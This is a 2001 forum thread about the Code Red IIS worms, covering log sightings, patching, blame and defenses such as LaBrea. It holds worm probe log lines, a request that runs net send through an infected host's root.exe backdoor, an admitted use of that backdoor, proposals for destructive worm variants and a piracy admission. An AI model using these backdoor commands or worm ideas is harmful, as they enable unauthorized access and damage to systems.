Something different in my apache logs

I have several different entries in my apache logs it is the XXXXXXXX string without the default.ida listed in it, the entire string is all XXXs with the same code following the string as the original default.ida/NNNN and default.ida/XXXXX requests. Just wondering if anyone else has seen this.

Re:Serious blow to open source & free software

you ain't kidding. read this gem at:
http://cnet.com/enterprise/0-9566-7-4561136.html

"While it may seem that the fault lies in IIS, these security flaws still don't suggest that another Web server will offer appreciably tighter security. Paul Robichaux of Robichaux & Associates, a security consultant and columnist for Microsoft's TechNet, says Windows 2000-based Web servers aren't any more vulnerable than other Web servers. All Web servers have security holes. Carnegie-Mellon University's CERT Coordination Center , a site devoted to improving Internet security, is a good indicator of the extent of Web security problems. The site reports on security breaches that plague virtually all Web server and related products.

What might make IIS 5.0 more prone to reveal its vulnerabilities than alternative Web servers such as Apache , may be--ironically--its popularity. It's likely that IIS's high visibility as Microsoft's flagship Internet product is reason enough to attract the attention of a lot of hackers.

So the bad news is that simply by running IIS you may be more likely to fall into a hacker's sights. The good news is that you can button up your IIS installation and foil the hackers."

They quote a columnist for Microsoft's TechNET who makes the false claim that IIS is more popular than apache, and attributes the widespread exploits to that (false) popularity!

Re:Back Door? Somebody call the Goatse.cx guy!

[Tackhead]

>My question here is, how the hell do you have a 'wider' backdoor than that?!

Well, suppose we had this giant electronic speculum ;-)

Code Red Cannot Be Stopped

[(void*)]

Kyle Reese: This code red virus, It's out there, looking for your IIS server. It feels no passion, no sympathy or remorse. It can't be bargained or reasoned with. It's just going to come for you, unless you can stop it yourself.

More fun

Windows net send messages can go to the whole domain, but this limits them to 128 characters. My modification to WebSnarf.pl makes a get request to "/scripts/root.exe?/c+net+send+%userdomain%+%22%CO MPUTERNAME%+is+infected+with+codered+and+attacked+ me.+Fix+it.%22"

Re:Buffer overflow vulnerabilities

[jilles]

Ah coding practices. Sorry, Murphy's law you know. If it can go wrong it will go wrong (and he porves himself right a lot lately). That's why even prorgams that have been around since the early days of UNIX are sometimes caught with their pants down (recent BIND bug anyone).

Any manual check can be forgotten and be a potential security hole. Once it is forgotten it merely depends on who finds the hole first: script kiddie or code maintainer.

And lets rub this in deeply, there are plenty of languages that protect you against the single most frequent cause of security leaks that is costing the world billions of dollars in damage annually (and it sure isn't C). Any program that is going to be exposed to hackers (i.e. any internet server software) should never ever be programmed in C. You simply cannot guarantee that the compiler and libraries are correct. Even if your program is correct, those still can be a potential source of bugs. Your average UNIX system likely has dozens of undiscovered potential buffer overflows.

Us java programmers are laughing our asses of each time a buffer overflow is wreaking havoc on the internet. We don't have to worry about such things. Java may not be the greatest thing, but you can rest assure that buffer overflows won't happen.

Re:As with the parent, so with the child.

[pmorrison]

True... and the Code Red Resource Kit, the Code Red SDK, 'Programming Code Red', 'Inside Code Red', and, through IDG, 'Code Red for Dummies'!

The patch *was* announced

[ferkelparade]

Alright, I'm not a big fan of MS either, but it must be said in all fairness that both the vulnerability and the patch were announced very early by Microsoft on their security bulletin newsletter. Subscribing to that newsletter is a matter of seconds, you don't even have to be a registered customer or anything (see here)
They sent out a warning to remove the isapi mappings the same day Code Red was discovered, and as soon as the patch was out, they sent out a notification...premier customers also received a mail message about a week later, but at that time, our servers were already patched :) It has been said too often already, but the main responsibility lies with admins who don't care to install patches and with clueless home users who don't even know they have a web server running...

Could this be it?

[ecki]

Found a lot of those in my access.log...:

NN.NN.NN.NN - - [10/Aug/2001:04:11:20 -0700] "GET / HTTP/1.0" 200 7023
NN.NN.NN.NN - - [10/Aug/2001:04:11:20 -0700] "GET /753f7d950154aaec...1cc7 HTTP/1.0" 404 258
NN.NN.NN.NN - - [10/Aug/2001:04:11:20 -0700] "GET /scripts/root.exe HTTP/1.0" 404 210
NN.NN.NN.NN - - [10/Aug/2001:04:11:21 -0700] "GET /MSADC/root.exe HTTP/1.0" 404 208
NN.NN.NN.NN - - [10/Aug/2001:04:11:21 -0700] "GET /c/winnt/system32/cmd.exe HTTP/1.0" 404 218
NN.NN.NN.NN - - [10/Aug/2001:04:11:25 -0700] "GET /d/winnt/system32/cmd.exe HTTP/1.0" 404 218
NN.NN.NN.NN - - [10/Aug/2001:04:11:26 -0700] "GET /NULL.ida?http-42.AAAAAA...AAAAAAAAA=X HTTP/1.1" 404 214
NN.NN.NN.NN - - [10/Aug/2001:04:11:29 -0700] "GET / HTTP/1.0" 200 7023
NN.NN.NN.NN - - [10/Aug/2001:04:11:30 -0700] "GET /NULL.idq?http-42.AAAAAAAA...AAAAAAAA=X HTTP/1.1" 404 214
NN.NN.NN.NN - - [10/Aug/2001:04:11:33 -0700] "GET / HTTP/1.0" 200 7023

Or is there somebody trying to exploit the CodeRed backdoors? Mind you, this is within a supposedly protected firefall.

Re:Could this be it?

[linuxrochester]

If your firewall has port80 open, then the server behind the firewall is open to attack.

Anxiously awaiting...

...Code Red XP and Code Red.NET

Re:Saddens me though

[egburr]

Linux and Apache are compatible. I'm running Apache on Linux right now. :)

Yes. I do know what was intended. But, it's fun to take things too literally occasionally.

Re:Help me out on this one...

[warrior]

What kind of server buffer handler would execute the content of the buffer?

That's not exactly what happens. Once the buffer overflow has occurred, the server is no longer in control. What happens is that the buffer overflow causes the stack pointer on the CPU to be overwritten, and so now the returning jump from the function is at a new address -- usually the address of a system call to get a root shell, etc. This is known as "smashing the stack".

Re:make some money off banner ads

[ekrout]

Please let me know when you decide whether I'm a "cockbiter" or a "pillowbiter".

And by the way, Coward, I'm a junior computer science & engineering major at a well-respected private university where I am the chairman of the Association for Computing Machinery (ACM). I also have a high IQ and don't hesitate to arrogantly and effectively deal with scum like yourself.

Have a nice day :-D

I feel so left out...

[Maditude]

Ever since Mediaone/AT&T started blocking port 80 (as of 2am last Monday here in Minnesota), I've been jealously watching you guys get to have all the fun.

On the bright side, I have gotten acknowledgement from RRcustomercare (Mediaone/ATT/RR/pick one fscking name already!) that yes, technically it is okay to run a server as long as you don't negatively impact others. Then again, they are still saying that until this worm dies out, none of their customers will be seeing any incoming packets on port 80. :-(

Re:less talk...more help

[linuxrochester]

If all of these admins had half a brain, they would have patched their servers already!!! As fo the "hidden" box, they can't be very good at what they do, if they DIDN"T KNOW THE BOX EXISTED!!! I wouldn't send them email stating Apache is better, I would tell them patch your sh*ty IIS server U f*cking worthless admin, then find a new career!!!!

One problem....

[JohnTheFisherman]

People need to patch servers that don't know they're servers. I have RoadRunner (cable modem), and I looked at my logs, and decided to try and track a few people down via http://ipattackingme. Almost none of them had a website up - just the stock 'page under construction.' So I suspected (and RR tech suppt. confirmed this) that most of these people are running IIS and DON'T KNOW THEY'RE RUNNING IIS.

RoadRunner is additionally trying to shut down individual cable modems, rather than some of the more extreme measures other providers are using (like killing port 80), so kudos to them. Please get the word out to anyone running 2K or NT to check their box, not just anyone who KNOWS they're running a website.

Re:One problem....

[barneyfoo]

Ahhhhhhh.... so THAT'S how microsoft is increasing its IIS share on netcraft.com. Interesting :)

Never Patch IIS Again!

[nlabadie]

Tired of applying patches to IIS? Tired of checking if your machine is infected with CodeRed? I've found the cure-all. And best of all, it's free!

Re:It's not like they haven't announced the patch

[Have+Blue]

There's also the subtle difference that flaws in Microsoft products don't kill people.

When compared to Star Wars...

[10Ghz]

In Star Wars, episodes 1, 2 and 3 suck, while episode 4 is good, and it get's better in 5. It then starts to die in episode 6.

What does that mean when it comes to Code Red? We haven't seen nothing yet! You thought episodes 1 and 2 were bad? Wait 'till we get to 4 and 5!

less talk...more help

[jcw2112]

I spent a couple of hours yesterday sending out emails to just about everyone that hit my box at home. Just toss the IP into a browser and get some contact info from the site that comes up (if one does come up). I got MANY replies thanking me for finding that "hidden" box on their network.

And no, this isn't the time to send off an email that says "ditch your M$ crap and goto apache" because most of these poor admins aren't running IIS because they WANT to...it's what they HAVE to do.

So let's take back some bandwidth already!

Re:less talk...more help

[jcw2112]

To be more clear about MY experience: at LEAST 4 of the responses I got were from people who were not what anyone would call "Administrators" but instead were working for small shops and wearing too many hats. I am a firm believer that if you have a web site that you need to have professionals that will take care of your system. But the world doesn't work like that. In the US we require a drivers license...does that mean that everyone on the interstate has one? I doubt it.

Back to my point: the FIRST priority is to get this thing under control. If someone hasn't patched it by now, they are OBVIOUSLY not a professional admin. Telling them that they are "wrothless" isn't going to win any cooperation as it's just pointing out the obvious. I think we need to be a little more pragmatic.

Re:less talk...more help

[AlXtreme]

And no, this isn't the time to send off an email that says "ditch your M$ crap and goto apache" because most of these poor admins aren't running IIS because they WANT to...it's what they HAVE to do.

Well, the code red worm should be enough to convince any manager about the dangers of IIS/Windoze software. I mean, they watch tv, don't they? Do THEY want bad pr because their servers are infected? Do THEY want to lose cash because of all the megs of viri-data that is sent? Tell them about a very secure server, that servers most of the internet's sites. Also tell them about the utter lack of high-profile bugs and holes, and auto-updating software (aka apt-get).

That should get any null-minded $$$-focussed manager to give you a go for it. Don't mention open-source, it's likely to work backward for your cause. Open-source still has the hobby-tag put on it of 4 years ago. (well, not with the managers with an ounce of IT know-how, but they should be running opensource software already ;)

the only real reason to not use apache et al is the use of ASP, but apache long has support for that , euhm, language kinda-thingy.

Ohwell, my post is kinda off-topic, just want to say that if the admin really wants to, he just has to flip the right switches. I'm with you with helping out instead of trolling, i mean, not everyone has seen the light yet, but thats no reason to be an pain in the ass...

Re:Microsoft should be sued

[Keith+Russell]

...I still think Microsoft is guilty here because their customers weren't aware their Windows-running boxes could start chewing up bandwidth...

If you are a sysadmin responsible for any server, regardless of operating system, it's your job to be aware. Microsoft's poor record may drive up the frequency of patches, but that doesn't change the fact that the difference between a good sysadmin and a bad one is the knowledge that no server runs itself.

Re:Bah.

[isorox]

Cabl modems in the UK are new (been out for justover month in my town). I think I'm pretty much the only one (well, therse about 50, giving a random pinging - broadast doesnt work) on my subnet, which is probably a town of 150-200,000.

I've only got 2 attemps in 2 weeks from my subnet.

Our university's student union servers were gettin the same number of hits as me up to a cuple of days ago.

Re:a harsher solutions, perhaps?

Maybe it's the fact that you're an absolute moron. Think so? I do.

Re:Bah.

Did you read it at all? This proprietary software won't run with the net patch. Moron. Theyr'e currently working on fixing it. I think Apache with mod_proxy would be the best temporary fix.

Re:make some money off banner ads

Oh my god. I hope you're being funny because if you wrote that post in seriousness you should commence suicide procedures immediately.

Wow, a respected private college...and you've learned so much that you "correct" people using the generally accepted shortform for IP address? That's sad. I see from your other posts that you've taken to filling the grammar-Nazi role. That's just fuckin' sad (by the way: I would gauge that you are both a pillowbiter and a cockbiter).

By the way, dildo, it's "appalled", not "appaled".

Get back to your masturbation little boy.

Perhaps REAL Damage will Fix the Problem

[Bilbo]

Root problem here is NOT so much the fact that MS makes buggy servers. Let's face it. Any software can have bugs. MS DID release a patch.

The problem is freaking clueless users installing web servers and then not maintaining them!

What we really need is a variant of Code Red that compleatly hoses any computer that it hits -- something that people can't overlook. Then and only then will the clueless twits running these servers get the idea that they have to be responsible when they expose themselves to the Internet.

Any volunteers?

Re:Perhaps REAL Damage will Fix the Problem

[CM39]

It runs as a service without even an icon in the taskbar.

Re:Perhaps REAL Damage will Fix the Problem

[sjonke]

I looked into one case and they did not know that IIS was running, and yes, they upgraded from NT 4.0 to Windows 2000. I don't know them personally nor have I talked with the owner directly, so I have no idea if they're an idiot, but I'd the idiots are at Microsoft, not this particular user. Microsoft is the master of bad/confusing design. If Windows 2000 doesn't enable IIS by default (which is what I was told) then either there is a but that sometimes enables it, or there is a UI desing that results in people sometimes accidentally enabling it.

Re:Perhaps REAL Damage will Fix the Problem

[RWC09]

If these people are not idiots that how could they either not know that they installed the server or/and not know that the server is running!

Re:Perhaps REAL Damage will Fix the Problem

[CM39]

I mentioned in another post that I personally know three people who were not even aware they were running servers.

They upgraded to win2k pro for the multi-tasking and stability and either somehow installed the server during installation or while playing around with "add/remove windows components"

Two of these three people are not stupid, but when you dont know a server is running it's difficult to patch it. I imagine if I know three cases there are probably thousands if not tens of thousands more.

I think the real stupidity was MS bundling it with the OS, they should have made it a seperate free download for people who knew they wanted it or at least made installing it much more difficult.

Microsoft has built a reputation on making windows idiot proof, but in this case have only proved themselves to be idiots.

I imagine if these people had been doing everything they should have to protect their systems they would have been running firewalls which might have been blocking port 80 but the majority of computer users don't and Microsoft should have anticipated this issue.

Re:Oh please, did you see Urban Legend II?

[optikSmoke]

Hey cool..... I live in Peterborough too, and always thought the archetecture at Trent University was pretty cool (which, BTW, is why they chose it as the location to film Urban Legends II)
maybe I should go see that sometime...

Maybe they should make a prequel

Code Red -3: The Internet Menance
Code Red -2: Attack of the Reds

Symptoms of Code Red 3?

[robbyjo]

I wonder if the symptoms of Code Red 3 is just similar as the one as the second version here or here? Or probably the first version?

Re:Copycats

[Syberghost]

Get over it. Code Red is dead.

The folks here at the Fortune 500 company I work for who have been working around the clock since Wednesday trying to clean up this mess will be real happy to hear that you don't believe it exists.

OT!

http://slashdot.org/askslashdot/99/11/11/0249242.s html

Re:Bah.

[Syberghost]

FYI, there appears to be some differences in the terminology between versions, and at least one major AV vender *cough*McAfee*cough* has crucial details wrong.

What CERT calls "Code Red II" is the third iteration, and that's what hit us. Some others are calling it III, and McAfee claims II doesn't run on NT. Which is bullshit.

Re:More info?

[loraksus]

http://loraksus.d2g.com/access.log
There, seems that there are lots of dumb asses in my IP range.

Tired of waiting. Time for C4! It nukes C:\WINNT

I'm sick of my cablemodem ISP telling me there's nothing they can do and to bear with them. Fuck that. It's time for some gool ol' vigilante justice.

It's time to modify the Code Red 3 virus into Code Red 4, or C4 (ironic name), and code it to either disable all networking functionality on WINNT machines or just nuke the C:\WINNT directory entirely. Of course it will have to not do this immediately in order to spread to all Win boxes.

ISPs and Microsoft had many chances to crrrect it. What has been the effect so far?

Re:Bah.

[MeowMeow+Jones]

Or you could just disable the isapi mapping to .ida extentions in IIS (and everything else you don't intend to use) Just right click on "Default Web Site" in MMC and you should find it pretty quick.

Not SYSTEM-level access....

[|0|4]

Actually, while the copy of cmd.exe in /scripts and /msadc can be used to run arbitrary commands, these commands will be run with the privilege level of the IUSR_MACHINENAME account - which defaults to GUEST privileges. So you can't do something fun like grab sam._.

A 'wider' backdoor, I think, would involve uploading some type of privilege escalation tool, to give IUSR_MACHINENAME admin rights. Now _that_ would be useful...

Re:Not SYSTEM-level access....

[SydBarrett]

"But Code Red II created virtual drives which allowed you to access cmd.exe directly via a corrupt explorer with root rights. So it had a pretty large back door to begin with - I look forward to the analysis of Code Red III if such a thing exists."

You sure about that? A friend of mine got infected (it's gone now) and told me about it. Just for kicks, I tried the exploit on him. Nothing dangerious, and I let him know in advance what I was doing. When I tried to do a simple "Copy file1 file2", I got a access denied error. Maybe I was doing it wrong, or something. Still, it was fun seeing everything on his hard drive. Anything that was text could be viewed with "type filename", dispite missing headers. Hell, with a web server log of infected machines and a port scanner to see if port 80 is still running, you can have lots of fun sneaking around.

Note: The last part is true with a lot of servers in Japan.

Re:An ETHICAL way to Anti-Virus

[Slur]

...and that script, whatever else it does should simply *not respond* or print anything back to the virus. I believe that if you just let the script hang the virus assumes there's nobody listening and moves on....

Use Open Source to Fight Code Red

[isn't+my+name]

Tom Liston came up with a cool idea for slowing Code Red and other TCP port scanners. He didn't have the bandwidth to host it, and I offered. So, this is a shameless plug, but if we can get enough of us doing this and get some press coverage, it's a great story that shows the power and speed with which open source solutions can be implemented. He first posted the idea on 7/31 just before Code Red started heating up again. Using the Trinux (http://www.thrinux.org) linux distribution, he cobbled together a floppy boot image that, with unused ip addresses and an old machine, can be used to slow the scans by responding to the initial TCP three way handshake and then ignoring everything else. The automated scanner has to time out before that thread can move on. According to reports on the SANS Intrusions discussion list, it seems to slow all variants of Code Red and on RPC scans as well. His announcement of LaBrea is at: http://www.incidents.org/archives/intrusions/msg01 368.html

Re:Use Open Source to Fight Code Red

[gblues]

The only problem is that the Code Red spawns 600 threads, and uses non-blocking sockets. That means that the only thing you've managed to do is slow down 1 of 600 threads; the other 599 are still going as fast as possible.

Nathan

Re:Use Open Source to Fight Code Red

That link for the announcement should be:

<A href:"http://www.incidents.org/archives/intrusions /msg01368.html"> http://www.incidents.org/archives/intrusions/msg01 368.html</A>

Re:Use Open Source to Fight Code Red

Perhaps you're on to something. It seems to me that the general thrust of TCP/IP firewalling/security has been to try to make the machine invisible to attackers, however the cliche that "security through obscurity" is worthless comes into play. Maybe somebody should could patch up inetd to give it this sort of behaivor on inactive ports?

Maybe the correct approach would be to put this in the TCP/IP stack itself, so that ports actually being used would be exempt...

Re:Use Open Source to Fight Code Red

[daveking]

Not if you do this:

cd /var/www/html (or apache server root)
dd if=/dev/urandom of=default.ida count=100000

Is that so wrong?

Re:Well...at least RR is trying to help...

[reflective+recursion]

I sure hope so. I got 625 attempts yesterday and 358 today so far (5pm). That (625) is DOUBLE what I was getting around Aug 3-7th.

I've tried and tried, but...

I still can't figure out what Code Red does!!!

Yeah, now we all know I'm not too bright.

I know it overflows the IIS buffer, I know it infects other computers. Does it cause harm, does it tell you that you've been screwed over by Code Red. I'm sitting on an NT server machine behind Novell controlled proxies and some good firewall protection, so I haven't witnessed what it does. I installed the patch as soon as I could get it, but assuming I contracted the deadly Code Red, what exactly would/could happen...

I'd appreciat a short explenation or a URL that explains Code Red a little better than "it spread and multiplies."

Re:Sig (Offtopic(Offtopic))

[Fishstick]

He he, yeah... that one has been around for a while but is still funny.

At work I have a penny jar (pretty good sized gallon apple cider jug) full of change on which I have taped a sign that says the same thing, except for 'penny' instead of 'nickel'.

Initially I got some funny looks from people who came by my cube, now they come over and drop a penny in everytime their machine locks up*.

*except now we are all using w2k and we don't get crashes much; people now mostly come over to raid the jar for the odd nickel and dime for the coke machine.

Re:ok you bigots :)

[baptiste]

That's Code Red II, released in teh wild Aug 4th. CRv2, the second variant of the original worm hit July 19th and again on Aug 1st. The ORIGINAL Code Red hit in early July - had a crappy IP gen routine and made little to no news cause it didn't go very far.

Re:Bah.

[ednopantz]

People use MS for no reason

No. People use MS because their company already has the client licenses, the admins are cheaper, their desktops and servers use a single set of security procedures and, for web hosting, they can port their desktop vb apps to IIS in no time.

If you already own 400 Win boxes, there is a pretty compelling argument for using a Win server product.

That said, I would be real careful what I used IIS for. I don't think I would expose confidential data to the extranet.

Re:Microsoft should be sued

I don't buy into that whole "it's the admins' fault" argument. It's not the responsability of the buyer to make sure a product works as advertised. Now, if in the IIS box there came a nice big pamflet that said "this software has bugs, be sure to update it at this url", now then it would be the admin's fault, since they would have been warned. But it would surprise me if anywhere inside the box it's mentioned that you've bought faulty software. Marketing wouldn't accept that.

MS sells an illusion of quality, and it's just that illusion that makes these security problems their fault, and not the admins' fault.

And to look at it on a bigger scope. Suppose you're a regular home user. You go to the store and buy a PC with windows preinstalled. Since you get the OEM version of Windows you don't get a nice windows box, you don't even get a decent manual, all you get is a license and, if you're lucky, a CD. Nowhere are you warned that the very first thing you need to do when you hook up that PC is to go to Windows Update. It's easy to claim that update your windows is simple, and I agree with that. But home users are afraid of messing up their system, so they'll only update when told to, which means that MS should very clearly tell them in a leaflet accompanying the new PC that they have to run Windows Update regularly. Again, MS instead tries to sell an illusion of quality. And it is this illusion which has led to the success of sircam.

Re:Linux to the rescue?

[Rimbo]

"Technically illegal?"

I don't know...is it illegal to use an open port on a machine if the person doesn't intend for us to use that port?

Let's say I leave port 80 open on my machine...unintentionally...and furthermore in such a way that private, confidential information can be seen and downloaded. If someone tries to read a web page or surf my now-open web browser, have they really broken any laws?

I don't think so. Because I'm the one who left the damned thing open.

An interesting thing about your comment is that perhaps Code Red II was built by white hats in the first place just for this reason -- to open up a back door on all of these folks' machines so that they could do just that. The US government protecting itself? Microsoft doing damage control? Blackhats? Who knows?

I think that if someone broke a hole in the wall of my house while I was on vacation, and someone came by and went inside my house just so that they could repair that hole, I would be grateful. I certainly wouldn't press charges.

Re:Serious blow to open source & free software

[SpinyNorman]

Seems like the movie people could learn somthing here too - how to make sequels that are as good as or better than the original.

Re:Part III?

[Mnemia]

The fact the old code red is turned off tells me that they might be linked to the same person(s) or something

I think it's more likely that because CR2 spreads so much faster than CR1 it has basically wiped out its ancestor. IIRC, version 2 can infect machines already infected with version 1, so due to the faster propogation rate, CR1 should quickly become rare indeed. That seems to be the case at least in my Apache logs...for the first several hours after CR2 began to hit me, the two versions were interspersed, but CR1 soon dropped off to a trickle.

Because of the idiots who trust on microsoft

[Lord_Sy]

It is not microsoft's fault that the idiots
who buy their software trust on them and
blindly agree to the EULA.

I won't pay a software company for a bunch of
compiled code that I don't actually know how
does it works, neither what it does!

You might say, those idiot's don't even know
that other OSes exist. But, if I had to
forcedly use such crappy software, I won't pay
for it. Instead I will borrow, or just stole
it.

I have used Windows 9x since 1998.
I have it installed on 2 of 3 machines at home.
I have copied the CD to my friends, and they
have the "pirated" copy installed on some
of their computers.
I never bought a copy.
I just stole a OEM pack from my past workplace.
I have a license agreement and a registration
card not filled yet (and i will never fill it).
I don't like to use pirated software.
But I'd like to see microsoft in bankruptcy.
I know I'd enjoy that.

Re:You know...

[pmz]

Just write a new version that infects IIS, shuts it off, installs a better web server, and voil&agrave, the world is a better place! It would be even better to uninstall IIS, but we all know it's impossible to uninstall Windows software.

Re:Buffer overflow vulnerabilities

[The+Wicked+Armadillo]

(Probably flame bait and needs no response, but I feel I must) No, that is what happens when you do not do any (I think it's called) bounds checking on the data you are getting ready to stick in a non dynamic space. It is possible to do the same think with any programming language I can think of (even basic but you would have to write your own routine for it). The problem although the result of a property of C/C++ is not caused by the language. This is caused by poor coding practices (like not checking the input data for a fixed space), and most likely project deadlines, and all of this coupled with poor QA on the product. Please do not blame the language for problems caused by poor code.

Use clear English.

[Futurepower(tm)]

Use clear English when you send messages to non-English-speaking countries. Otherwise there is little chance you will be understood.

Something like: "Your computer has the Code Red virus! It attacked my computer. See http//www...."

Include a link to a site which explains how to fix the problem.

Re:Please

[krappie]

It's kind of hard to get people to patch their servers when so many people are just sitting there on the default IIS web page. These are the people who don't know how to run or patch a web server. These are the people who don't even know they are running a web server.

Good luck getting the word out to them.

As with the parent, so with the child.

[pmorrison]

It usually takes Microsoft 3 releases to get it right. So, when can we expect Code Red .Net?

Re:As with the parent, so with the child.

[the_ph0x`]

It usually takes Microsoft 3 releases to get it right. So, when can we expect Code Red .Net?

Nah, we still have Code Red III sp3b to get to yet...

.ph0x

Re:As with the parent, so with the child.

quit while you're ahead

Follow-up viruses?

[swngnmonk]

Out of curiousity - does the MS patch address the fact that CR2 puts administrator-level access in the webroot, publicly available to all? What's to keep someone from writing something that exploits this, looking for boxes that have been patched, and removing the patch - re-enabling the vulnerability to CR? Or surreptitiously opening additonal services? Or hell, simply executing del (is that the command in DOS?) c:\? It's a good thing humanity in general hasn't been more vicious yet - every single one of these boxes that have been compromised could have been rendered useless by this point.

Re:Follow-up viruses?

[dermotfitz]

now that is a damn good point! Listening Billy?

Re:Follow-up viruses?

[ncc74656]

What's to keep someone from writing something that exploits this, looking for boxes that have been patched, and removing the patch - re-enabling the vulnerability to CR? Or surreptitiously opening additonal services? Or hell, simply executing del (is that the command in DOS?) c:\?

NT and Win2K aren't DOS, but DEL is in there. DELTREE is also in NT IIRC, but it isn't in Win2K (not that it'd be hard to copy over Win98's DELTREE and use that).

An infected server sounds like the ideal place to throw up a warez/pr0n/mp3z site on someone else's nickel...use ftp.exe to fetch a batch file that then builds a directory structure and pulls the files (or "filez," since it's that kind of site) over. If they're too stupid to have patched against CodeRed2, they're probably too stupid to check their logs to find out why their available bandwidth has apparently shrunk to nothing. It'd be an interesting idea to try out, if I had no sense of moral inhibition and/or didn't think I'd get caught. :-)

Besides, if it's the site of a company you don't particularly like, imagine what would happen if the SPA or BSA came knocking and found Office XP ISOs available for download at http://www.fubared-company.com/warez...

Re:Follow-up viruses?

[malfunct]

the MS patch only helps machines that have NOT been comprimised by the virus. The patch fixes the exploit that is used to get the virus on the machine in the first place, it doesn't fix the virus itself.

Saddens me though

[Hammer]

That Linux and Apache are not compatible.
We seem to have a good ways to go befoer everything that runs on Winblows will also run on Linux :-))

Re:Saddens me though

[TangoCharlie]

"That Linux and Apache are not compatible"? Compatible with what? What then is Windows "compatible" with? Itself? That doesn't seem make sense. Linux as a server platform is now well established... Linux as a mainstream desktop platform is still someway off. Don't worry, it'll happen. Eventually.

Re:Saddens me though

[Fishstick]

>The comment you were replying too was moderated as funny, so it must be some kind of joke

they say you ruin the joke if you have to explain it, but in this case there isn't much to ruin...

The original post (Hammer) seems to try to make a joke of the fact that Apache (and Linux) are not compatible with the series of Code Red worms.

We seem to have a good ways to go befoer everything that runs on Winblows will also run on Linux

Then the reply to this (egburr) plays on the literal interpretation that Apache is not compatible with Linux...

Yes. I do know what was intended. But, it's fun to take things too literally occasionally.

And no, I didn't have anything better to do (waiting for a co-worker to get back from cig break to ask her a question before I head out) than to post this. Sue me. :-)

Code Red XP

[JiveDonut]

Lets' skip ahead of Code Red IV. I think we should utilize .NET to build a super worm. We'll call it Code Red XP.

What kind of features should we add? Other than the obvious: Remove Windows and install something else.

Re:Code Red XP

I like the way you think!

Re:Code Red XP

How about installing a gnutella client which shares their entire harddrive, and also converting any mailboxes to a standard mbox format first, so we can all spy on each other ?

Make sure to share any CDs in the cd drives too. I'm tired of paying for software.

It's not like they haven't announced the patch

[mblase]

Remember the recent Ford Explorer/Firestone fiasco? Firestone made a bunch of flawed tires (when and where is not important here) that were put on these Explorer SUVs, which in some cases fell apart and came off the wheel when driving at high speeds. Investigations were made, and eventually Firestone had to issue a complete recall of the tires.

The media talked about it for weeks. Ford sent out letters to customers as far as they could find them. People brought their SUVs in, got new tires put on them, drove out. That's how product recalls usually go.

Software patches aren't all that different. When a hole is discovered, a patch is made. Responsible Microsoft server administrators have the MS site automatically checked on a daily basis for critical updates and patches. Irresponsible admins don't bother, and they become vulnerable and the cause of the worm's spread.

But it would be insane to propose MS should force-feed this server patch to all their customers. The problem isn't the software, it's the admins. You'd be hard-pressed to find a major newspaper in the civilized world that hasn't mentioned this worm yet, and still there are people who don't bother to patch. They're the same ones who think that server software is just like desktop software, where you're the only one who uses it that really matters.

Firestone couldn't make its customers bring their SUVs in to have the tires replaced for free, and there's no way the customers could claim ignorance of the problem after the press got done with it. Likewise, Microsoft can't make its customers upgrade their software for free. They've honestly tried to make all their server customers aware of what's expected of them, but they're as powerless to force it to happen as Firestone is to force car drivers to rotate their tires every 6,000 miles.

Re:It's not like they haven't announced the patch

[Quay42]

What do you think the patch is for? Even Slashdotters' much-adored Apache software isn't immune to the occasional oversight. The difference is that, as yet, almost everyone who runs Apache is a responsible administrator who already knows the importance of keeping things up-to-date.

Amazing to think that something other than Microsoft products could possibly have bugs! This just rocks my world. Really though, its good to see someone who can acknowledge that the mighty *n*x OSs are not flawless. Granted, Linux has proved to me enourmously more stable than Windows in most instances, it is by no means perfect, nor are the applications that run on it (and the other UNIX variants).

I had my phase of "Microsoft is the evil empire, pumping out more and more shoddy code every day" until I actually became a Windows developer (hey, go where the money is) and have found that programs that crash aren't the fault of Microsoft, but rather oversights on my part. Naturally, since most programmers can write bug-free code to start with, I'm obviously in the minority here. Maybe I'm just not good enough to write code that uses some ridiculously obscure and untested API call so I can proclaim "Ah ha! You're in for it now M$!"

Really folks, Linux and *BSD (and various other variante) are excellent and well crafted OSs but the average (and not *necessarily* unintelligent) user likes to use Microsoft products for the same reason that makes AOL the most popular ISP (or close to it) around. John L User doesn't like to have to edit .rc and .conf files all day long so that they're video card and PCI cards will work correctly with their OS of choice. Anyhow, now that I've gone way off topic here I essentially wanted to say that I agree with the poster that said that Microsoft is doing all it can to make people aware of the bug (go figure, its a buffer overflow problem, that *never* happens...especially never ever in Linux software!) in their webserver and there is no excuse to be an "unconnected" web administrator.

Re:It's not like they haven't announced the patch

When a ford SUV with firestone tires gets in an accident, only those immediately around them are in danger. If your analogy was valid here, when a tire blew, it would cause tires in China, other states, or Europe to blow.

Re:It's not like they haven't announced the patch

[rebelcool]

Hm, well to design such a system as those you would need to know how to design a really good real-time system. And if you know how to do that, you're not a 'stoopid mcse'.

Kinda like asking my mom to design a car engine...

Re:It's not like they haven't announced the patch

[ClosedSource]

As been noted elsewhere, Win2K does NOT install a web server by default.

Re:It's not like they haven't announced the patch

[WankersRevenge]

So in a nutshell, you are blaming consumers for the corporation's mistakes? I agree that admins should take some responsibility in rectifying the situation, but companies such as Microsoft should be held accountable for producing shoddy products in the first place. And lets face it, not everyone is super connected and does know about this. Its Microsoft's responisibilty to do everything they can to notify Win 2000 customers and solve this problem. It's their design flaw, not the admins. So they need to fix it. The end.

Re:It's not like they haven't announced the patch

[drc500free]

But if someone's system got screwed around because of the backdoor, they could definitely sue Microsoft, just like people who were in accidents sued Firestone.
Granted, with the M$ defense team they probably couldn't win, but it's not like it would be thrown out of court...

Re:It's not like they haven't announced the patch

[TheMidget]

> There's also the subtle difference that flaws in Microsoft products don't kill people.

Not yet.

What if some stoopid MCSE gets the idea of designing a medical life-support system around an NT PC? Or until he uses an Win2000 PC to command door opening/closing in a prison? Or until he uses NT to steer a ship? Or until he uses a SQL-server to manage a nuclear power plant? In all those situations, failure can potentially have deadly consequences. Sure, in peace time the ship just gets towed to port, but imagine a failure happening during combat? I know, Microsoft specifically disclaims any warranties for such uses, but has that stopped anybody?

Re:It's not like they haven't announced the patch

[Syberghost]

There's also the subtle difference that flaws in Microsoft products don't kill people.

Don't be so sure; there are Microsoft products in use on the space shuttle, the space station, and Navy warships.

Even if they're just pushing data around, bad data in those environments can result in death.

In 2001Ad war was beginning.

Chief: What happened?
Admin: Someone set up us the bomb!
Admin: We get signal
Chief: What?
Admin: Main screen turn on!
Chief: It's you!
Code Red: How are you gentlemen!
All your base are belong to us!

hey taco!

i overflowed your mom's buffer last night. she seemed to like it.

Re:Code Red IV

[Ether+Trogg]

It's only a matter of time before CR4 hits, monopolizing off of CR2's success

Yeah, but at least then the Justice Department can file an antitrust lawsuit against the virus.

